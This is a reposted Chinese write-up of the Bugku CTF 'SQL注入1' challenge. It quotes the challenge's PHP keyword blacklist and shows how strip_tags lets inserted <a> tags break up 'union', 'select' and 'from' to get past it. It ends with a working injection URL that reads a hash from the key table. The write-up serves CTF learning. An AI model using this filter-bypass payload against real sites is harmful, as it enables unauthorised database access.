bugku ctf平台之sql注入1 write up
来源:互联网 发布:淘宝申请退换货流程 编辑:程序博客网 时间:2024/06/07 10:16
题目链接 : http://103.238.227.13:10087/
//过滤sql$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');foreach ($array as $value){if (substr_count($id, $value) > 0){exit('包含敏感关键字!'.$value);}}//xss过滤$id = strip_tags($id);$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
上面 //过滤sql对sql注入进行了严格的过滤,完全没法注入,但百密必有一疏,下面的//xss过滤中的 strip_tags($id) 函数,使得注入有了思路。
首先看一下strip_tags这个函数:
strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。
那么可以利用这点,在union等敏感字中间加上 <a><br>等标签。
题目提示:
访问参数为:?id=x
查找表为key的数据表,id=1值hash字段值
直接构造注入语句:http://103.238.227.13:10087/?id=-1 u<a>nion selec<a>t 1,hash fro<a>m .key
阅读全文
1 0
- bugku ctf平台之sql注入1 write up
- bugku ctf平台之变量1 write up
- bugku CTF练习平台writeup
- ctf bugku 变量1
- bugku SQL注入测试
- bugku sql注入2
- bugku sql注入2
- bugku CTF-练习平台 部分writeup
- CTF练习平台sql注入测试writeup
- CTF/CTF练习平台 --SQL注入测试【sql宽字节注入与#,%23】
- ctf bugku Linux基础1 wirteup
- 2017-0CTF-simplesplin-write up
- SQL注入1(南邮CTF)
- CTF web总结--sql注入
- 百度杯CTF Write up集锦 WEB篇
- bugku never give up
- bugku ctf文件包含 writeup
- bugku ctf 一段base64 wirteup
- Oracle性能优化-读懂执行计划
- java提高篇(二四)-----HashSet
- 简述slice和splice区别
- C语言程序设计(26)
- 神经网络梯度与归一化问题总结+highway network、ResNet的思考
- bugku ctf平台之sql注入1 write up
- DOM
- 第七讲 Spring MVC中AJAX和JSON的处理
- Android 项目从零到上线的全过程
- Linux vmstat命令实战详解
- 《UNIX网络编程 卷1》 笔记: 使用poll函数的单进程TCP回射服务器程序
- id生成策略-(xml、annotation)-4
- 知识图谱的笔记之一(1)
- 一步步学习kotlin for android(一)配置kotlin